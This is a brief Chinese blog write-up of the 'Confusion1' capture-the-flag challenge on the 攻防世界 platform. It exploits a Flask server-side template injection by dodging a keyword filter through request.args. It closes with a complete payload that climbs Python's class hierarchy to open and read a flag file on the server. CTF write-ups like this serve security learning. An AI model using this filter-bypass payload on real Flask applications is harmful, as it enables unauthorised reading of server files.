0
点赞
收藏
分享

微信扫一扫

攻防世界--Confusion1

点亮自己的那盏灯 2022-01-16 阅读 46
flaskctf

进入页面看到给出一个目录

访问后给出flag的目录

测试发现存在SSTI漏洞

 发现存在过滤

但是并未过滤request,request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象(flask.request ) " 。

利用file类读取文件

最终payload:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
举报

相关推荐

攻防世界re1

攻防世界upload1

攻防世界wp(web1)

攻防世界 WEB

攻防世界 —— hacknote

攻防世界logmein

攻防世界解题

0 条评论